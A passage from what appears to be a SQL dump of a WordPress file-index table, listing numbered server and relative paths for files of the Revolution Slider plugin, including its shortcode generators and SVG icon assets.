content/plugins/revslider/admin/includes/shortcode_generator/divi/includes/modules/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/includes/modules/index.php'),(2042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/index.php'),(2043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/revslider-divi.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/revslider-divi.php'),(2044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/builder-bundle.min.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/builder-bundle.min.js'),(2045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/frontend-bundle.min.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/frontend-bundle.min.js'),(2046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/frontend.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/frontend.js'),(2047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/scripts/index.php'),(2048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/styles/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/styles/index.php'),(2049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/elementor/elementor-widget.class.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/elementor/elementor-widget.class.php'),(2050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/elementor/elementor.class.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/elementor/elementor.class.php'),(2051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/elementor/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/elementor/index.php'),(2052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/dist/blocks.build.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/dist/blocks.build.js'),(2053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/dist/images/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/dist/images/index.php'),(2054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/dist/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/dist/index.php'),(2055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/gutenberg-block.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/gutenberg-block.php'),(2056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/index.php'),(2057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/plugin.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/plugin.php'),(2058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/images/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/images/index.php'),(2059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/images/js-wapuu.svg','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/images/js-wapuu.svg'),(2060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/index.php'),(2061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/blocks.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/blocks.js'),(2062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/gutenberg-block.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/gutenberg-block.php'),(2063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/index.php'),(2064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/deprecated.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/deprecated.js'),(2065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/index.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/index.js'),(2066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/index.php'),(2067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/revSliderImage.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/revSliderImage.js'),(2068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/revslider.js','wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/revslider/revslider.js'),(2069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/index.php'),(2070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/shortcode_generator.class.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/shortcode_generator.class.php'),(2071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/wpbakery/index.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/wpbakery/index.php'),(2072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/shortcode_generator/wpbakery/wpbakery.class.php','wp-content/plugins/revslider/admin/includes/shortcode_generator/wpbakery/wpbakery.class.php'),(2073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/template.class.php','wp-content/plugins/revslider/admin/includes/template.class.php'),(2074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/tooltips.class.php','wp-content/plugins/revslider/admin/includes/tooltips.class.php'),(2075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/tracking.class.php','wp-content/plugins/revslider/admin/includes/tracking.class.php'),(2076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/includes/widget.class.php','wp-content/plugins/revslider/admin/includes/widget.class.php'),(2077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/index.php','wp-content/plugins/revslider/admin/index.php'),(2078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/revslider-admin.class.php','wp-content/plugins/revslider/admin/revslider-admin.class.php'),(2079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/builder-layer-forms.php','wp-content/plugins/revslider/admin/views/builder-layer-forms.php'),(2080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/builder-nav-forms.php','wp-content/plugins/revslider/admin/views/builder-nav-forms.php'),(2081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/builder-slide-forms.php','wp-content/plugins/revslider/admin/views/builder-slide-forms.php'),(2082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/builder-slider-forms.php','wp-content/plugins/revslider/admin/views/builder-slider-forms.php'),(2083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/builder-timeline.php','wp-content/plugins/revslider/admin/views/builder-timeline.php'),(2084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/builder.php','wp-content/plugins/revslider/admin/views/builder.php'),(2085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/add_ons.php','wp-content/plugins/revslider/admin/views/features/add_ons.php'),(2086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/assets/index.php','wp-content/plugins/revslider/admin/views/features/assets/index.php'),(2087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/index.php','wp-content/plugins/revslider/admin/views/features/index.php'),(2088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/layer_animations.php','wp-content/plugins/revslider/admin/views/features/layer_animations.php'),(2089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/object_library.php','wp-content/plugins/revslider/admin/views/features/object_library.php'),(2090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/premade_template.php','wp-content/plugins/revslider/admin/views/features/premade_template.php'),(2091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/features/support.php','wp-content/plugins/revslider/admin/views/features/support.php'),(2092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/footer.php','wp-content/plugins/revslider/admin/views/footer.php'),(2093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/header.php','wp-content/plugins/revslider/admin/views/header.php'),(2094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/index.php','wp-content/plugins/revslider/admin/views/index.php'),(2095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/modals-builder.php','wp-content/plugins/revslider/admin/views/modals-builder.php'),(2096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/modals-copyright.php','wp-content/plugins/revslider/admin/views/modals-copyright.php'),(2097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/modals-general.php','wp-content/plugins/revslider/admin/views/modals-general.php'),(2098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/modals-overview.php','wp-content/plugins/revslider/admin/views/modals-overview.php'),(2099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/admin/views/overview.php','wp-content/plugins/revslider/admin/views/overview.php'),(2100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/backup/index.php','wp-content/plugins/revslider/backup/index.php'),(2101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/EspressoDev/InstagramBasicDisplay.php','wp-content/plugins/revslider/includes/EspressoDev/InstagramBasicDisplay.php'),(2102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/EspressoDev/InstagramBasicDisplayException.php','wp-content/plugins/revslider/includes/EspressoDev/InstagramBasicDisplayException.php'),(2103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/EspressoDev/index.php','wp-content/plugins/revslider/includes/EspressoDev/index.php'),(2104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/aq-resizer.class.php','wp-content/plugins/revslider/includes/aq-resizer.class.php'),(2105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/backwards.php','wp-content/plugins/revslider/includes/backwards.php'),(2106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/basic-css.php','wp-content/plugins/revslider/includes/basic-css.php'),(2107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/cache.class.php','wp-content/plugins/revslider/includes/cache.class.php'),(2108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/coloreasing.class.php','wp-content/plugins/revslider/includes/coloreasing.class.php'),(2109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/colorpicker.class.php','wp-content/plugins/revslider/includes/colorpicker.class.php'),(2110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/cssparser.class.php','wp-content/plugins/revslider/includes/cssparser.class.php'),(2111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/data.class.php','wp-content/plugins/revslider/includes/data.class.php'),(2112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/em-integration.class.php','wp-content/plugins/revslider/includes/em-integration.class.php'),(2113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/extension.class.php','wp-content/plugins/revslider/includes/extension.class.php'),(2114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/facebook.class.php','wp-content/plugins/revslider/includes/external/facebook.class.php'),(2115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/flickr.class.php','wp-content/plugins/revslider/includes/external/flickr.class.php'),(2116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/index.php','wp-content/plugins/revslider/includes/external/index.php'),(2117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/instagram.class.php','wp-content/plugins/revslider/includes/external/instagram.class.php'),(2118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/twitter.class.php','wp-content/plugins/revslider/includes/external/twitter.class.php'),(2119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/vimeo.class.php','wp-content/plugins/revslider/includes/external/vimeo.class.php'),(2120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external/youtube.class.php','wp-content/plugins/revslider/includes/external/youtube.class.php'),(2121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/external-sources.class.php','wp-content/plugins/revslider/includes/external-sources.class.php'),(2122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/favorite.class.php','wp-content/plugins/revslider/includes/favorite.class.php'),(2123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/functions.class.php','wp-content/plugins/revslider/includes/functions.class.php'),(2124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/globals.class.php','wp-content/plugins/revslider/includes/globals.class.php'),(2125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/googlefonts.php','wp-content/plugins/revslider/includes/googlefonts.php'),(2126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/index.php','wp-content/plugins/revslider/includes/index.php'),(2127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/navigation.class.php','wp-content/plugins/revslider/includes/navigation.class.php'),(2128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/navigations.php','wp-content/plugins/revslider/includes/navigations.php'),(2129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/object-library.class.php','wp-content/plugins/revslider/includes/object-library.class.php'),(2130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/output.class.php','wp-content/plugins/revslider/includes/output.class.php'),(2131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/page-template.class.php','wp-content/plugins/revslider/includes/page-template.class.php'),(2132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/slide.class.php','wp-content/plugins/revslider/includes/slide.class.php'),(2133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/slider.class.php','wp-content/plugins/revslider/includes/slider.class.php'),(2134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/update.class.php','wp-content/plugins/revslider/includes/update.class.php'),(2135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/woocommerce.class.php','wp-content/plugins/revslider/includes/woocommerce.class.php'),(2136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/includes/wpml.class.php','wp-content/plugins/revslider/includes/wpml.class.php'),(2137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/index.php','wp-content/plugins/revslider/index.php'),(2138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/languages/index.php','wp-content/plugins/revslider/languages/index.php'),(2139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/index.php','wp-content/plugins/revslider/public/assets/assets/index.php'),(2140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/sources/index.php','wp-content/plugins/revslider/public/assets/assets/sources/index.php'),(2141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_3d_rotation_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_3d_rotation_24px.svg'),(2142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessibility_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessibility_24px.svg'),(2143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessible_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessible_24px.svg'),(2144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_24px.svg'),(2145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_wallet_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_wallet_24px.svg'),(2146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_box_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_box_24px.svg'),(2147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_circle_24px.svg'),(2148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_add_shopping_cart_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_add_shopping_cart_24px.svg'),(2149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_24px.svg'),(2150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_add_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_add_24px.svg'),(2151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_off_24px.svg'),(2152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_on_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_on_24px.svg'),(2153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_all_out_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_all_out_24px.svg'),(2154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_android_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_android_24px.svg'),(2155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_announcement_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_announcement_24px.svg'),(2156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_aspect_ratio_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_aspect_ratio_24px.svg'),(2157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assessment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assessment_24px.svg'),(2158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_24px.svg'),(2159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_ind_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_ind_24px.svg'),(2160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_late_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_late_24px.svg'),(2161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_return_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_return_24px.svg'),(2162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_returned_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_returned_24px.svg'),(2163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_turned_in_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_turned_in_24px.svg'),(2164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_autorenew_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_autorenew_24px.svg'),(2165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_backup_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_backup_24px.svg'),(2166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_book_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_book_24px.svg'),(2167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_24px.svg'),(2168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_border_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_border_24px.svg'),(2169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bug_report_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bug_report_24px.svg'),(2170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_build_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_build_24px.svg'),(2171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_cached_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_cached_24px.svg'),(2172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_camera_enhance_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_camera_enhance_24px.svg'),(2173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_giftcard_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_giftcard_24px.svg'),(2174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_membership_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_membership_24px.svg'),(2175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_travel_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_travel_24px.svg'),(2176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_change_history_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_change_history_24px.svg'),(2177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_check_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_check_circle_24px.svg'),(2178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_chrome_reader_mode_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_chrome_reader_mode_24px.svg'),(2179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_class_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_class_24px.svg'),(2180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_code_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_code_24px.svg'),(2181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_compare_arrows_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_compare_arrows_24px.svg'),(2182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_copyright_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_copyright_24px.svg'),(2183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_credit_card_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_credit_card_24px.svg'),(2184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dashboard_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dashboard_24px.svg'),(2185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_date_range_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_date_range_24px.svg'),(2186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_delete_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_delete_24px.svg'),(2187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_description_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_description_24px.svg'),(2188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dns_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dns_24px.svg'),(2189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_24px.svg'),(2190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_all_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_all_24px.svg'),(2191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_large_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_large_24px.svg'),(2192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_small_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_small_24px.svg'),(2193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_eject_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_eject_24px.svg'),(2194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_24px.svg'),(2195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_seat_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_seat_24px.svg'),(2196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_exit_to_app_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_exit_to_app_24px.svg'),(2197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_explore_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_explore_24px.svg'),(2198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_extension_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_extension_24px.svg'),(2199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_face_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_face_24px.svg'),(2200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_24px.svg'),(2201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_border_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_border_24px.svg'),(2202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_feedback_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_feedback_24px.svg'),(2203,'